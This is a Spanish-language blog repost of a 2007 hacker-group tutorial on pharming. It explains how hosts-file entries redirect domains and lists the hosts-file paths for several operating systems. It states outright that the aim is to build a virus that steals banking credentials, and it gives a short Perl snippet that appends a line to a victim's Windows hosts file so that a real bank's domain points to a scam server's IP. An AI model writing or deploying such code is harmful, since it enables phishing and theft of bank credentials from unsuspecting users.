miércoles, 15 de agosto de 2012

Pharming Basics by JosS 




print
"\t\t#################################################\n\n";



print
"\t\t#        Pharming.txt -
Spanish Hackers Team      #\n\n";



print
"\t\t#                  by
JosS                       
#\n\n";



print
"\t\t#################################################\n\n";















##Pharming.







Hola
a todos!.







Hoy
[21-9-07] me gustaría hablarles del pharming, principalmente de su uso y abuso.



Es
una vulnerabilidad que reside en los servidores DNS, aquellos servidores que



transforman
URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son



fines
no legales, como puede ser el Phising, una de las prioridades de esta vuln.







Más
que nada quiero enfocar este manual al uso práctico de virus creados para el
robo



de
credenciales.







##Hosts.







En
todos los sistemas operativos, ya sean de particulares o empresas



poseen
un archivo llamado 'hosts' en el se encuentran las URLs y las IPs a las que se



dirigen.



Si
nosotros podemos escribir en ese archivo 'hosts' podríamos hacer que al entrar
a



google.com
fuera a www.zone-h.org. Veamos un ejemplo:







127.0.0.1
localhost







Esto
quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que
cuando



ponemos
localhost en nuestro navegador nos dirigimos a nuestra máquina.







##Rutas.







#
Windows 95/98/Me: C:\Windows\Hosts



#
Windows NT/2000: C:\WINNT\System32\drivers\etc



#
Windows XP: C:\WINDOWS\system32\drivers\etc



#
Windows 2003: C:\WINDOWS\system32\drivers\etc



#
Windows Vista: C:\WINDOWS\system32\drivers\etc



#
Unix (en general): /etc/hosts



#
Linux (en general): /etc/hosts



#
MacOS (en general): /etc/hosts







En
esos directorios se encuetra un archivo llamado 'hosts'. El cual podemos
modificar a



nuestro
gusto.







##Code.







Si
queremos crear un virus dedicado al robo de credenciales bancarias el uso de la
técnica



Pharming
nos dará muchos resultados.



Imaginemos
que tenemos un Scam del 'Banco BBVA' en la IP = 85.235.65.99 y qeremos que la



víctima
que a sido infectada por el virus al entrar a la web oficial del 'Banco BBVA',



redireccione
a nuestro Scam. Para eso haríamos esto:







85.235.65.99
bbva.es







La
programación del virus:







my
$mensaje = "85.235.65.99 bbva.es";







$dir
= ' C:\WINDOWS\system32\drivers\etc\hosts ';







open
(HOSTS, ">>$dir");







print
HOSTS $mensaje;















print
"\t\t#################################################\n\n";



print
"\t\t#      Pharming.txt -
Spanish Hackers Team       
#\n\n";



print
"\t\t#                    by
JosS                     
#\n\n";



print
"\t\t#################################################\n\n";







#
spanish-hackers.com














Publicado por



en







































No hay comentarios:















Publicar un comentario


















        

      









Suscribirse a:
Enviar comentarios (Atom)